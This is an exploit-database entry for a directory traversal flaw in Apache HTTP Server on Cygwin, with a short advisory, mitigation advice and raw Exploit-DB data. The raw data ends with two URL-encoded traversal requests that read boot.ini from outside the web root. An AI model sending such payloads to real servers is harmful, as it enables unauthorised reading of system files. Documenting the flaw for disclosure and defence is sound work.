header-logo
Suggest Exploit
vendor:
Apache HTTP Server
by:
N/A
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Apache HTTP Server
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Cygwin

Apache Directory Traversal Vulnerability

Apache may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory. This issue is only reported to present itself in Apache running on cygwin platforms. A remote attacker may traverse outside the server root directory by using encoded '..' character sequences.

Mitigation:

Upgrade to the latest version of Apache or apply the recommended patches.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9733/info

It has been reported that Apache may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory. This issue is only reported to present itself in Apache running on cygwin platforms. A remote attacker may traverse outside the server root directory by using encoded '\..' character sequences.

http://www.example.com/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://www.example.com/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini

Navigation

Suggest Exploit

Services By CQR